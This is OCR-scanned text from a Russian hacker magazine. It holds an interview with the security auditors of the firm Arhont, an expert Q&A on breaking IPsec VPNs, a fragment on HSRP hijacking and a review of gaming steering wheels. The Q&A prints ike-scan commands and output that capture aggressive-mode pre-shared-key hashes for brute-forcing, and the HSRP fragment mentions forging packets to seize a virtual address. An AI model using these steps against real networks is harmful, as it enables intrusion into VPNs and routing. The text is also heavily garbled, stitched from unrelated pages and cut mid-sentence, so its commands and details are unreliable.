достаточно свежее и посвя- 
щено новым направлениям 
криптографии, связанным 
с обеспечением безопасности 
работы в сетях. Тут тебе 
и шифры с открытыми ключа- 
ми, и методы цифровой 
подписи, и основные криптог- 
рафические протоколы, бло- 
ковые и потоковые шифры, 
крипто-графические хэш- 
функции. Единственный не- 
достаток подобной литерату- 
ры: изложено довольно сухо 
(читай «строго»). Примеры, 
конечно, есть, но они явно 
оторваны от жизни, поэтому 
не наглядны 


АНДРЕЙ ВЛАДИМИРОВ 


УШЕЛ В П ИЗ «ЧИСТОЙ» 
НАУКИ, ТАК КАК «ТАМ НЕ 
ДАЮТ ЗАНИМАТЬСЯ ЧЕМ 
ХОЧЕШЬ». СПЕЦИАЛИЗИ- 
РУЕТСЯ В ОСНОВНОМ НА 
БЕЗОПАСНОСТИ СЕТЕВОЙ 
ИНФРАСТРУКТУРЫ: МАРШ- 
РУТИЗАТОРЫ, КОММУТАТО- 
РЫ, ТОЧКИ ДОСТУПА И Т.Д. 


КОНСТАНТИН 
ГАВРИЛЕНКО 


СПЕЦИАЛИСТ С ОПЫТОМ 
РАБОТЫ В СФЕРЕ ИТ- 
БЕЗОПАСНОСТИ БОЛЕЕ 12- 
ТИ ЛЕТ. СОАВТОР ДВУХ 
КНИГ: «WI-OY: СЕКРЕТЫ 


БЕСПРОВОДНОГО ВЗЛОМА» 
И «СЕКРЕТЫ ХАКЕРОВ: БЕЗ- 


ОПАСНОСТЬ СЕТЕЙ CISCO» 


АНДРЕЙ 
МИХАЙЛОВСКИЙ 


БОЛЕЕ ДЕСЯТИ ЛЕТ АКТИВ- 
НО ЗАНИМАЕТСЯ СЕТЯМИ, 
СИСТЕМАМИ АУТЕНТИФИ- 
КАЦИИ, БЕСПРОВОДНОЙ 
СВЯЗЬЮ, КОМПЬЮТЕРНОЙ 
БЕЗОПАСНОСТЬЮ 

И УЧАСТВУЕТ В РАЗРАБОТ- 
КАХ И ИССЛЕДОВАНИЯХ 


РАБОТАЕТ С ПРОТОКОЛА- 
МИ НА НИЖНИХ УРОВНЯХ: 
КАНАЛЬНЫЙ, СЕТЕВОЙ, 
БЕЗОПАСНОСТЬ КОММУТА- 
ЦИИ И МАРШРУТИЗАЦИИ 


проверено 
электроникой 


АУДИТОРЫ БЕЗОПАСНОСТИ 


ОНИ АВТОРЫ НЕСКОЛЬКИХ ПОПУЛЯРНЫХ КНИГ ПО БЕЗОПАСНОСТИ, МНОГОЧИСЛЕННЫХ 
ПУБЛИКАЦИЙ ОБ ОБНАРУЖЕННЫХ УЯЗВИМОСТЯХ НА ФОРУМАХ И СЕТЕВЫХ РЕСУРСАХ (BUG- 
TRAQ, PACKETSTORM, SECURITYLAB), А ТАКЖЕ В ПРЕССЕ (LINUX WORLD, LINUX MAGAZINE, 
INFORMATION SECURITY AUDITOR, INTERNET WORLD, THE BYTE). ОНИ РУССКИЕ :), HO 
БАЗИРУЮТСЯ В АНГЛИИ. С НИМИ МЫ И ПОБЕСЕДОВАЛИ... |АНАРЕЙ КАРОЛИК (ANDRUSHAGREAL.XAKEP.RU) 


КОМПАНИИ «АРХОНТ» 


КОНСТАНТИН ГАВРИЛЕНКО: В сфере инфосека самое простое — основать и организовать свое де- 
ло, в первую очередь — начать продавать сервисы и свои знания: для этого не нужно дорогостоящее 
оборудование, помещения и т.д. Соответственно, затраты на организацию несоизмеримо меньше. На- 
чинали скромно, у каждого по десктопу, выход в интернет :). Потом прикупили несколько лаптопов (для 
беспроводных сетей), пару маршрутизаторов, и так до пары раков с оборудованием. Когда мы откры- 
вались, про нас вообще никто не знал, все мы пришли из сфер, не связанных с ИТ, поэтому пришлось 
достаточно много времени потратить на наработку связей в индустрии, какой-то известности, довери- 
тельных отношений с клиентами. Стереотип «русских хакеров» часто проявлял себя как незаменимый, 
а иногда наоборот... 

АНДРЕЙ МИХАЙЛОВСКИЙ: Поскольку «Архонт» небольшая компания, приходится выполнять раз- 
носторонние обязанности от общения с клиентами до высокотехнических сфер. И буквально через год 
после открытия компании о нас знали на разных компьютерных выставках и конференциях, а еще че- 
рез год вышла первая книга — «Wi-Foo: the Secrets of Wireless Hacking». Чем больше мы узнавали ры- 
нок, тем сильнее убеждались в своих способностях в области компьютерной безопасности. Как показа- 
ла практика, реальных специалистов в этой сфере не так уж много. 
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АНДРЕЙ ВЛАДИМИРОВ: Все зависит от величины интереса. Главное — иметь команду, которая спо- 
собна выполнять разносторонние функции, чтобы участники были активны и желали привнести что-ни- 
будь свое в работу компании. А в плане рынка — иметь свою нишу, причем нужно искать ее как раз не 
из-за узконаправленности предоставляемых услуг, а скорее наоборот. Не быть привязанным к одному 
производителю, системе методологий или решению, а предоставлять клиенту выбор с оценкой оптиму- 
ма, учитывая его специфические требования и бюджет. Как говорится, клиент всегда прав. 


КОНСТАНТИН ГАВРИЛЕНКО: Вообще-то я из Риги :). Так уж получилось, что учиться пришлось в 
Англии. Сначала школа, потом институт, потом магистратура. На момент окончания обучения я провел 
в Англии семь лет, успел адаптироваться и обзавестись друзьями и контактами. К тому же была идея 
открытия своего бизнеса, а нглийский рынок для этого подходил, то есть вопрос решился сам собой. До- 
полнительное «за» состояло в том, что мы все были не только из разных городов бывшего Советского 
Союза, но даже из разных республик, а на сегодня — еще и из разных государств. Переезд куда-то на 
новое место жительства означало то, что придется начинать все заново, с нуля. 

В России все только начинается, рынок потихоньку движется в правильном направлении, и потенциал 
развития просто огромный. Основная проблема, на мой взгляд, в том, что менеджмент компаний еще 
не осознал важность направления информационной безопасности, связанные с этим потенциальные 
убытки, что основная ответственность ложится на них и что это не работа для простого админа/компью- 
терщика. Факультет ВМК МГУ и профессор Сухомлин работают в правильном направлении, и, возмож- 
но, с нашей помощью в скором времени появится отдельная программа по подготовке специалистов по 
ИТ-безопасности. 

АНДРЕЙ МИХАЙЛОВСКИЙ: Я бы не сказал, что в Англии учеба лучше, чем в России, скорее наобо- 
рот. Система образования в этой стране основана на узкой специализации учеников, что в конечном 
итоге ограничивает сферу знания и интересы людей. Я выбрал Англию из-за ее репутации на междуна- 
родном уровне. Ведь многие на западе считают Россию коррумпированной страной, с распространен- 
ным взяточничеством, что, в свою очередь, негативно сказывается и на образовании. К тому же менедж- 
мент и бизнес-науки в Англии преподаются лучше, так как в европейских вузах в этой сфере накопле- 
но больше опыта. 

К сожалению, коммерческий рынок ИТ-безопасности в России практически не существует и, можно ска- 
зать, опаздывает минимум на пять лет по сравнению с Европой, Азией и Америкой. На российском рынке 
специалисты по безопасности не пользуются популярностью, к тому же совсем не многие фирмы могут 
выделить из бюджета по $2 000 в день на эти услуги, что по европейским стандартам считается нормой. 
АНДРЕЙ ВЛАДИМИРОВ: Чем больше живу, тем тверже убеждаюсь в том, что «свобода выбора» — 
всего лишь миф. Если, конечно, твоего отца зовут не Билл Гейтс. В моем конкретном случае, на момент 
переезда в Англию «выбор» был: либо принимать предложенный грант от Лондонского университета, 
либо буквально жить на улице. В моей лаборатории (а я тогда работал в биотехе) просто-напросто за- 
кончились реактивы, животные, не было доступа к последним публикациям на изучаемые темы. Союз 
окончательно развалился, исследователи в республиках СНГ (в данном случае на Украине) оказались 
просто-напросто никому не нужны. 

А в России перспективы, безусловно, есть. Приезжаю время от времени читать курсы в АИС в Москве. 
Появляемся с докладами на российских конференциях. Со временем, очевидно, откроем свое предста- 
вительство в России и, в принципе, мы полностью открыты предложениям отечественных компаний... 


КОНСТАНТИН ГАВРИЛЕНКО: В данном случае важно не количество, а качество. В последнее время 
появилось достаточно много контор по безопасности, которые используют пару-тройку различных ком- 
мерческих сканеров и выдают их за полноценный аудит безопасности, что формирует у потребителя 
ложное чувство обеспеченности безопасностью. В плане диверсификации у каждого участника коман- 
ды есть своя зона ответственности, потом складывается общий результат работы. Конкурентоспособ- 
ность в основном достигается за счет качества выполненной работы. 

АНДРЕЙ МИХАЙЛОВСКИЙ: Для проверки безопасности не обязательно иметь большой коллектив 
работников: чем больше людей работают над проектом, тем тяжелее организовать и собрать нужную и 
детальную информацию, прийти к конкретному решению задачи. Оптимально — четыре-шесть человек 
в команде для получения результативного аудита большинства средних и крупных компаний. 

Работая с клиентами, мы всегда смотрим на безопасность с позиций потребителя, полностью учитыва- 
ем структуру предприятия-клиента, сферу деятельности и его потребность в компьютерной безопаснос- 
ти. Мы никогда не навязываем какой-то одной компании сервис, решение или оборудование. Наоборот, 
предлагаем выбор и подробно оцениваем кандидатуры. Большинство наших конкурентов для аудита 
используют решение или программное обеспечение той или иной компании, тем самым ограничивая се- 
бя и предоставляемый сервис. Мы стараемся смотреть на безопасность со всех сторон, использовать 
как можно больше оборудования и утилит, при этом проверяем и анализируем каждый полученный ре- 
зультат. В этом одно из главных наших отличий от конкурентов, которые проводят автоматизацию не- 
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обдуманно, прогоняют коммерческий сканер или программу, распечатывают отчет и считают, что аудит 
безопасности на этом закончен. 

АНДРЕЙ ВЛАДИМИРОВ: Вспоминается старый анекдот о сравнении нашей и японской корпораций, 
он заканчивается на фразе «Вот никак не поймем, что же делает здесь 501-й сотрудник». Множество 
сотрудников в больших компаниях — балласт, особенно в консультационных компаниях. У нас баллас- 
та нет, и отбор людей весьма тщательный, он не зависит от личных симпатий и антипатий. На крайний 
случай под рукой есть проверенные специалисты для привлечения к выполнению отдельных заданий на 
контрактной основе. Кстати, сколько сотрудников было в Microsoft году так в 77-м? 

Мы можем многое. Практически любая операционка, любой уровень OSI и сетевой протокол, любая то- 
пология сети... Конкуренты же в этом плане часто отстают. К примеру, во многих фирмах методология 
проведения внутренних и внешних аудитов сетей ничем не отличаются. Беспроводные сети нормально 
не покрыты. Не уделяется внимания протоколам на канальном уровне. Нет уровня экспертизы, позво- 
ляющего находить новые уязвимости, есть жесткая привязка к отдельным решениям специфических Гы 
производителей. И так далее... и 


КОНСТАНТИН ГАВРИЛЕНКО: Мир инфосека слишком динамичен, чтобы какая-то определенная об- 
ласть оставалась актуальной долгое время. Наиболее уязвимы новые технологии, которые еще не про- 
верены временем, или технологии, набирающие популярность. Последние пару лет все без исключения 
конторы по безопасности демонстрируют способы проникновения через уязвимости в web’e. Складыва- 
ется такое впечатление, что кроме 5ОЁ-инъекции и седьмого уровня, больше ничего не существует. К 
сожалению, это не так, и при оценке безопасности сетевой инфраструктуры многие вещи остаются не- 
замеченными, что мы неоднократно видели, проверяя работу других «экспертов». В плане зесийу-обо- 
рудования, на мой взгляд, стоить обратить внимание на системы предотвращения вторжения (IPS), web- 
брандмауэры (Layer-7 firewall), SSL виртуальные частные сети (SSL VPN) и системы централизованного 
управления беспроводными сетями. 

АНДРЕЙ ВЛАДИМИРОВ: Защита инфраструктуры сетей: коммутаторов, маршрутизаторов и т.д. Им 
должно уделяться не меньше внимания, чем серверам. Беспроводные сети всех типов. Мобильные уст- 
ройства и их встроенные операционные системы. \\!еб-приложения. Базы данных. Системы предотвра- 
щения вторжений (IPS), защита клиентских устройств на уровне ядра системы и системных вызовов, 
концепция «самозащищающихся» сетей. «Умная» и действенная фильтрация спама и вредоносных 
программ. В отдельных областях (интернет-магазины, аукционы, казино и букмекеры) — DDoS-atakn и 
эффективная защита от них. 


КОНСТАНТИН ГАВРИЛЕНКО: Спим мало :), да и то обычно перед компьютером. Вся информация в 
книгах, статьях о новых уязвимостях — это наработки, сделанные за время проведения аудитов. А са- 
мо написание после проделанных исследований занимает не так уж и много времени. Главное — это 
стремление познать что-то новое, найти новые методы решения задач. 

АНДРЕЙ МИХАЙЛОВСКИЙ: Смотря что называть работой. Для нас и других специалистов в сфере 
компьютерной безопасности работой может считаться почти все что угодно — от конфигурации прог- 
раммы или девайса, проверки протоколов и стандартов до программирования и создания кода и 
эксплойтов. Большую часть времени мы проводим перед компьютерами, читая документации, статьи и 
публикации, играясь с различными программами и оборудованием. 


КОНСТАНТИН ГАВРИЛЕНКО: Конечно, есть. Взгляни на лист опубликованных найденных уязвимос- 
тей :). Кроме того, наша методология оценки безопасности и проникновения в беспроводные сети, опуб- 
ликованная в аппендиксе к «Wi-cby», была первым систематизированным документом на эту тему. В 
плане утилит... Мы в основном используем ПО с открытым кодом, поэтому не только берем, но и отда- 
ем взамен для общего блага. Например, на данный момент единственной утилитой, способной генери- 
ровать произвольные пакеты для EIGRP-npotokona маршрутизации, является наша EIGRP-tools. Приме- 
чательно, что все наши утилиты включены в различные дистрибутивы для оценки безопасности, значит, 
время было потрачено не зря. 

АНДРЕЙ МИХАЙЛОВСКИЙ: «Архонт» разработал несколько образцов и шаблонов для проверки без- 
опасности беспроводных сетей, которыми пользуются многие консультанты и коммерческие организа- 
ции в нашей индустрии. Мы также создали шаблоны для анализа оборудования, программ и стандар- 
тов с проприетарным кодом. Во время написания Hacking Exposed «Архонт» разработал методы и ути- 
литы для проверки безопасности оборудования и протоколов, использованных компанией Cisco при 
распределении трафика в интернете. 

АНДРЕЙ ВЛАДИМИРОВ: Разумеется, есть, и кое-что надо будет даже запатентовать. А информацию 
насчет обнаружения новых уязвимостей и написания утилит с открытым кодом для «общественного 
пользования» ты всегда можешь найти на наших сайтах: Www.arhont.com, www.wi-foo.com И www.hackingciscoex- 
posed.com ДЖ 
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задай 
вопросы 
по темам 
следующих 
выпусков 
на форуме: 


http://forum.xakep.ru/forum.asp?forumID=17 


ВОПРОС: ЗНАКОМЫЙ АДМИН РАССКАЗАЛ, 
ЧТО ЗЛОБНЫЕ ХАКЕРЫ ВЗЛОМАЛИ 

ЕГО IPSEC ВИРТУАЛЬНУЮ ЧАСТНУЮ СЕТЬ. 
ВЧС НАДЕЖНА, РАЗВЕ МОЖНО 
ВЗЛОМАТЬ ЕЕ? 


спроси 
эксперта! 


«ВСЕ ЗАВИСИТ ОТ КРИВИЗНЫ РУК АДМИНА» 


НА ВОПРОСЫ ОТВЕЧАЕТ ЭКСПЕРТ ЭТОГО НОМЕРА КОНСТАНТИН ГАВРИЛЕНКО — 
СПЕЦИАЛИСТ С ОПЫТОМ РАБОТЫ В ИТ-БЕЗОПАСНОСТИ БОЛЕЕ 12-ТИ ЛЕТ. 
УВЛЕКАЕТСЯ КОМПЬЮТЕРАМИ С 12-ТИ ЛЕТ, НАЧИНАЛ С «АТАРИ 130» :). ОСНОВНЫЕ 
СФЕРЫ ДЕЯТЕЛЬНОСТИ КОНСТАНТИНА: БЕЗОПАСНОСТЬ СЕТЕВОЙ 
ИНФРАСТРУКТУРЫ И БЕСПРОВОДНЫЕ СЕТИ |AHAPEM КАРОЛИК (ANDRUSHAGREAL.XAKEP.RU) 


ОТВЕТ: В первую очередь все зависит от кривизны рук админа. Нормальный админ может правильно 
настроить и обезопасить машину на винде, в то время как админ, страдающий врожденной кривору- 
костью, настежь откроет сервер на OpenBSD. Те же самые принципы относятся и к установке BUC и 
настройке любых других сервисов. ВЧС на основе IPSEC принято считать надежным и безопасным ре- 
шением, хотя и достаточно сложным в установке. Как известно, чем изощреннее решение, тем вероят- 
нее ошибки в нем: сложно разобраться в работе всего процесса досконально. 

Попробую объяснить на пальцах, как, скорее всего, взломали твоего товарища. Существует два 
режима работы: AH (Authenticated Header) и ESP (Encapsulated Security Payload). При использовании АН 
данные He шифруются, а только добавляется заголовок аутентификации пакета. При использовании ESP 
пакет полностью шифруется и добавляются новые ПР-заголовки. Если админ использовал IPSEC в режи- 
ме АН, то вполне возможно, что кто-то перехватил важную информацию и использовал ее для дальней- 
шего взлома. Назвать это взломом туннеля, конечно, сложно. Только если с очень большой натяжкой. 

Существует несколько типов работы ВЧС. Используя статические ключи или используя IKE, для 
согласования протоколов и алгоритмов и генерации динамических ключей шифрования и аутентифика- 
ции. В большинстве случаев используется IKE. Соответственно, для аутентификации клиентов могут 
быть использованы или пароль (PSK), или х509-сертификат. Существует также несколько режимов, ис- 
пользуемых для установления аутентифицированного обмена ключа: Aggressive, Quick и Main. По край- 
ней мере, одна из комбинаций режимов работы может быть фатальной при слабом значении секретно- 
го ключа, что, скорее всего, так и было. 

Если используются одновременно агрессивный метод обмена и секретный ключ, существует воз- 
можность удаленного получения хэшей, пригодных для получения значения ключа методом перебора. 
Одной из наиболее продвинутых программ для нумерации 1РЗЕС-туннелей является ike-scan — www.nta- 
monitor.com/tools/ike-scan, Огромное количество опций позволяет создавать практически любые произволь- 
ные пакеты КЕ. Представим гипотетическую ситуацию: админ использовал секретный ключ и не убрал 
агрессивный режим. Сначала при помощи ike-scan проверим, что IPSEC используется на хосте. 


arbontus # ike=scan =v 192.168.99.9 

Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/) 
192.168.99.9 Main Mode Handshake returned HDR=(CKY-R=6182785ec0174f£07) SA=(Enc=DES 
Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) 


Как видно по выводу утилиты, мы получили информацию об используемых типах шифрования и мето- 
дах аутентификации. Теперь попытаемся вытащить данные, необходимые для взлома, подставив nony- 
ченные значения. 


arhontus # ike-scan -v -А --trans 1,2,1,2 --dhgroup=2 --idtype=1 -Paggressive_psk 
Я 

Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/ ) 

--- Pass 1 of 3 completed 

192.168.99.9 Aggressive Mode Handshake returned HDR=(CKY-R=6182785eabc881b0) 
SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds 


перебойную работу сети. НЗВР-протокол запатентован Cisco и, соответственно, поддерживается только 

их оборудованием. Существует альтернативный открытый протокол VRRP (1с2338), его поддерживают и 

используют другие производители, он также обеспечивает лучшую аутентификацию пакетов. 
Использовать HSRP в сетях, где нет доверия к пользователям, не стоит, даже при включенной ау- 


формация, необходимая для захвата виртуального адреса, содержится в транслируемом пакете. Запус- 
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Для посылки произвольного пакета воспользуйся утилитой hsrp из праз. Но имей в виду, что па- 
кеты оповещения посылаются каждые три секунды. Так что, если хочешь, чтобы члены НЗАР-группы 


ОФФТОПИК 


пронесемся 
с ветерком 


ТЕСТИРОВАНИЕ РУЛЕЙ 


НИЧТО НЕ СРАВНИТСЯ 

С НОЧНОЙ СКОРОСТНОЙ 
ПОЕЗДКОЙ ПО ГОРОДУ... 

НО ЧТО ДЕЛАТЬ, ЕСЛИ 

ТВОЙ ПЕПЕЛАЦ ДАВНЫМ- 
ДАВНО ЗАРЖАВЕЛ 

В ГАРАЖЕ? РЕШЕНИЕ 
ВСЕ-ТАКИ ЕСТЬ! АЛЕКСЕЙ шУВАЕВ 


Каждый раз, когда проходишь мимо витрины с игровыми манипуляторами, 
в твоей голове рождается мысль: «А что если взять вот этот руль и устроить 
заезд?» Но даже для самых ярых геймеров руль с педалями принадлежит 
к области бессмысленных трат. Другое дело клавиатура или мышь: мы пос- 
тоянно контактируем с ними, а покупать руль, чтобы устанавливать его раз 
или два в месяц, несерьезно. Однако посмотрим на такое приобретение 
с другой стороны. Вспомни, сколько раз ты, сидя перед компьютером и ус- 
танавливая новый автосимулятор, жалел о нехватке на столе руля и педа- 
лей под ним. Сколько виражей и красивых поворотов со сносом одной или 
двух осей не состоялось только потому, что клавиши обладают всего двумя 
СОСТОЯНИЯМИ: «включено» и «выключено». Немного довернуть, немного сни- 
зить скорость очень легко, но в результате — треск клавиатуры и никакой 
реалистичности. 

Теперь представь, что на твоем столе стоит руль с обратной связью. 
Крепко ухватив баранку, ты запускаешь трассу и погружаешься в совер- 
шенно иной мир, где можно абсолютно безнаказанно врезаться, поворачи- 


вать руль ровно настолько, насколько это необходимо, и не срываться 

с места, а плавно стартовать и обходить всех на виражах. А каково почув- 
ствовать то, что асфальт кончился и гравийка не очень хорошо отражается 
на скорости. Или понять в резком повороте, что машина начинает срывать- 
ся в занос, и немного сместить руль? Все это возможно, стоит лишь приоб- 
рести руль с обратной связью. Мы тебя убедили? 

>» технологии. Прежде чем бежать в магазин с криком «Дайте мне вон 
тот красненький руль с 20-ю кнопками!», нужно усвоить несколько правил. 
Удобство вождения — гарантия хороших показателей на трассе. Прежде 
всего, необходимо оценить силу и реалистичность работы обратной связи. 
В магазине вряд ли станут устанавливать десяток рулей, чтобы показать те- 
бе, как будут работать вибромоторчики. Здесь сразу разделим устройства 
на два класса: с поддержкой обратной связи (Force Feedback) и с поддерж- 
кой вибрации (Vibration). Как ясно по названию, вторые будут просто пере- 
давать вибрацию при изменении условий вождения (столкновение с препят- 
ствием или смена дорожного покрытия), а первые вполне способны активно 


сопротивляться твоей манере вождения. К примеру, ты легко почувствуешь 
занос, если твою машину таранят или тебя начинает крутить, — руль стано- 
вится непослушным, при пересечении участка дороги с гравийным покрыти- 
ем он дрожит и иногда тебя подкидывает из стороны в сторону. Дай-ка я 
угадаю, какой вариант предпочтешь ты? 

Теперь о возможностях собственно рулей. Эти устройства аналого- 
вые, то есть величина сигнала (будь то угол поворота руля или сила нажа- 
тия педали) не может быть равной постоянному значению, как на клавиа- 
туре («нажато»/»не нажато»). Вот почему сигнал разбит на несколько со- 
ставляющих, каждый из которых отвечает за свою ось. Ось в нашем слу- 
чае — независимый канал передачи информации. К примеру, поворот ру- 
левого колеса передается по одной оси, а все остальные педали и рычаги 
могут иметь разные каналы, и чем их больше, тем выше реалистичность. 
Представь, что твой руль с педалями обладает двумя осями: одна отведе- 
на под руль, вторая — педалям. Одновременное нажатие двух педалей 
приводит к тому, что либо совсем отключается газ и работает тормоз, ли- 
бо две педали нейтрализуют значение друг друга. Итак, чем больше осей, 
тем лучше. В нашем тесте имеется модель с пятью осями, что предусмат- 
ривает независимую работу педалью газа, тормоза, ручного тормоза и да- 
же сцепления. Большинство моделей, представленных на рынке, облада- 
ют всего двумя или тремя независимыми каналами, что вполне подойдет 
для аркадных гонок, а в некоторых случаях и для раллийных. 

Внедрение новых технологий позволяет избавиться от реостатов, ко- 
торые со временем изнашиваются из-за механической связи , и заменить 
механику оптическими сенсорами, чтобы повысить срок жизни девайса. 
> методика тестирования. Руль — это манипулятор, ты выбираешь его 
один раз и пользуешься им долго. Однако такой девайс может дополняться 
педалями и рычагом переключения передач, а значит, в таком виде он зай- 
мет немало места. Для того чтобы доставить покупку домой, можно задей- 


ствовать курьерскую службу, взять машину (если нет своей) или воспользо- 
ваться общественным транспортом. Если ты решишь нести драгоценную по- 
купку сам, то немаловажным будет вес, габариты и наличие ручек у короб- 
ки — на этом мы основали первый фактор формирования оценки. 

Далее следует оценить комплектацию и длину всех шнуров. Согласись, 
сложно добиться реалистичности, если шнуры настолько короткие, что блок 
педалей свисает со стола, не дотягиваясь до пола. 

Простота установки и калибровки заняла третью позицию в очеред- 
ности оценки. Сюда же входит удобство установки, надежность фиксации 
всех блоков и индивидуальные параметры руля, такие как угол поворота и 
количество кнопок. 

Все настроено и проверено. Наконец-то начинаем игровой тест, в нем 
принимали участие два человека (чтобы выставленные оценки были объек- 
тивными). Использовались игры из серии Need For Speed — довольно попу- 
лярного и распространенного симулятора. Выбор пал на две версии (UN- 
DERGROUND 2, MOST WANTED), так как эти игры позволяют частично и 
иногда даже полностью задействовать обе педали и предусматривают как 
аккуратное прохождение поворотов без резкого перекладывания руля из 
одного положения в другое, так и резкие рывки на узких улочках. Это не 
значит, что мы не оценивали скорость поворота — были учтены точность и 
плавность хода. 

После всех тестов выставлялась завершающая оценка — за эргоно- 
мику. Диаметр и изменение положения руля, метод фиксации, величина хо- 
да педалей и их жесткость и, конечно же, материал, из которого изготовле- 
ны органы управления. Эргономичные углубления под пальцы, прорезинен- 
ные педали — все это, безусловно, заслуживает придирчивого внимания. 
Большую роль играло воздействие обратной связи (Force Feedback) на иг- 


рока. Оценивалась реалистичность и сила воздействия. 


тестовый стенд: 

МАТЕРИНСКАЯ ПЛАТА: Asus PSND2-SLI Deluxe 
ПРОЦЕССОР: Intel Pentium 4 EE 3.73 

ПАМЯТЬ: 4x512 Мб Corsair DDR-2 3-2-2-8 

КУЛЕР: Zalman CNPS7700 Cu 

ЖЕСТКИЙ ДИСК: Western Digital WD200 

БЛОК ПИТАНИЯ: 480 Вт Thermaltake +350 Вт Thermaltake 


Test_lab выражает благодарность за предоставленное на тестирование 


оборудование компаниям: 


«АЛИОН» (тел. (495) 727-18-18, www.alion.ru), «БЮРОКРАТ» 


(тел. (495) 745-55-11, www-buro.ru), 


а также российским представительствам компаний Saitek и Logitech 


Logitech Formula 
Force GP 


($80) 9 баллов 


МАТЕРИАЛ: пластик, прорезиненный руль 


УГОЛ ПОВОРОТА РУЛЯ: 180 градусов 


КОЛИЧЕСТВО ОСЕЙ: 2, приоритет тормоза 


КОЛИЧЕСТВО КНОПОК: 4 


БОНУС: 2 подрулевых переключателя 


> плюсы. Привлекательный ди- 
зайн, небольшие размеры и хоро- 
шее имя притягивают внимание. До- 
стаем девайс из коробки и закреп- 
ляем его — нет ничего проще. Две 
крупных ручки на верхней панели, 
на которых установлены прижимные 
пластины, имеют резьбу. Диапазон 
регулировки по толщине столешни- 
цы очень велик, и проблем с уста- 
новкой не возникнет. Достаточно уп- 
ругие педали с большим ходом мо- 
гут несколько утомить, если будешь 
часто нажимать на тормоз, но поз- 
волят плавно регулировать ско- 
рость. Удачно подобран размер 
пластиковых «ступней»: газ несколь- 
ко больше, и найти его вслепую под 
столом не составит труда. Руль вы- 
полнен из пластика с красными ре- 
зиновыми вставками и имеет не- 
большой диаметр, что удобно (даже 
маленькие дети поиграть смогут). 
Четыре программируемые 
кнопки расположены довольно удоб- 
но, если предположим, что пальцы 


игрока будут находиться там, где их 
представили себе дизайнеры. Рабо- 
та обратной связи не вызвала наре- 
каний. Четкое ощущение смены до- 
рожного покрытия, столкновений — 
все это отражается на руле. Сопро- 
тивление повороту несколько мень- 
ше, чем у Logitech MOMO Racing, но 
вполне достаточно, чтобы опреде- 
лить необходимый моментт работы 
рулем при сносе оси. 

> — минусы. Несколько насторажи- 
вает материал изготовления вин- 
тов — пластик. Впрочем, сломать за- 
жимы удастся только при грубом об- 
ращении. Длина провода педалей 
невелика, но они легко дотянутся 

до пола и позволят игроку немного 
отодвинуть ноги вперед. Сама па- 
нель с педалями стоит на резиновых 
ножках, но никак не застрахована от 
проскальзывания на ковре. Эргоно- 
мичная форма руля предполагает 
расположение руки вдоль большой 
спицы, что оказалось не очень удоб- 
но при частых поворотах. Несколько 
разочаровали подрулевые переклю- 
чатели: они довольно маленькие и 
располагаются на некотором удале- 
нии от самого колеса на широкой 
спице. Чтобы переключить скорость, 
придется тянуться. 
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МАТЕРИАЛ: пластик 


УГОЛ ПОВОРОТА РУЛЯ: 180 градусов 


КОЛИЧЕСТВО ОСЕЙ: 2, приоритет тормоза 


КОЛИЧЕСТВО КНОПОК: 10 


БОНУС : крест (джойстик), 
совместимость с PlayStation 


> плюсы. Небольшие размеры 
коробки и малый вес девайса гаран- 
тируют удобство при транспортиров- 
ке. Открываем коробку и видим 
плотно и надежно упакованные руль 
и педали. Гаджет не требует допол- 
нительного питания и черпает энер- 
гию от порта USB. Кабель подклю- 
чения имеет не один коннектор, а 
два: USB и стандартный разъем иг- 
ровой платформы PlayStation. Так 
что обладатель одного руля и двух 
игровых устройств (компьютера и 
игровой приставки) сможет убить 
двух зайцев. Установка и калибров- 
ка руля займет всего несколько ми- 
нут: после инсталляции драйверов 
необходимо зайти в настройки, нес- 
колько раз повернуть руль из сторо- 
ны в сторону и поочередно нажи- 
мать педали — и вот уже откалиб- 
ровано. Руль крепится присосками, 
но есть возможность усилить фикса- 
цию двумя металлическими струб- 
цинами, для которых имеются спе- 
циальные отверстия в передней час- 


СРАЗУ РАЗДЕЛИМ УСТРОЙСТВА НА ДВА КЛАССА: 


ти панели. Регулировка по толщине 
столешницы очень велика — поряд- 
ка 10 см. На руле расположены ос- 
новные кнопки управления, как и на 
игровом джойстике. Эргономичные 
углубления для пальцев довольно 
удобны. Педали подключаются 
длинным кабелем, что обеспечивает 
комфорт при игре даже человеку 
высокого роста. Размеры и форма 
педалей газа и тормоза отличаются, 
поэтому игрок сможет опознать 
нужную не глядя под стол. 

> — минусы. Дополнительного пи- 
тания не обеспечено, поэтому мото- 
ры обратной связи имеют в своем 
распоряжении небольшой ток, вы- 
даваемый портом USB, и, соответ- 
ственно, небольшую мощность. 
Force Feedback реализована в виде 
двух вибромоторчикаов, которые 
расположены симметрично от руле- 
вой колонки и просто вибрируют в 
нужные моменты, ненамного при- 
бавляя реалистичности. Руль имеет 
автоцентрирование, реализованное 
двумя пружинами, — баранка всег- 
да будет стремиться вырваться из 
рук и вернуться в центральное по- 
ложение. Педали довольно мягкие 
и не выдержат веса ступни, то есть 
во время игры придется постоянно 
держать ноги в напряжении. 


С ПОДДЕРЖКОЙ ОБРАТНОЙ СВЯЗИ (FORCE FEEDBACK) 


И С ПОДДЕРЖКОЙ ВИБРАЦИИ (VIBRATION) 


МАТЕРИАЛ: пластик 


УГОЛ ПОВОРОТА РУЛЯ: 180 градусов 


КОЛИЧЕСТВО ОСЕЙ: 2 


КОЛИЧЕСТВО КНОПОК: 8 


БОНУС: 2 подрулевых аналоговых 
переключателя 


> плюсы. Удачная компоновка 
узлов в коробке сократила габарит- 
ные размеры и повысила удобство 
при транспортировке до игрового 
места. Комплектация небогатая, но 
руль, педальный узел, пара струб- 
цин и диск с драйверами ты най- 
дешь. Рулевой блок устанавливает- 
ся на присосках, но желательно за- 
крепить его струбцинами, которые 
гарантируют устойчивость при ак- 
тивной работе баранкой. На цент- 
ральной широкой спице расположе- 
ны шесть программируемых кнопок, 
но функцию переключения передач 
лучше подвесить на рулевые кноп- 
ки. Приятно удивили подрулевые пе- 
реключатели-лепестки, они дублиру- 
ют педали газа и тормоза и являют- 
ся аналоговыми, то есть можно, не 
подключая педальный узел, плавно 
регулировать торможение и ускоре- 
ние транспортного средства. Сам 
блок имеет большую площадку для 
ног, а ход педалей можно назвать 


средним. Благодаря удачной кон- 
струкции узел не будет скользить по 
ворсистой поверхности. Калибровка 
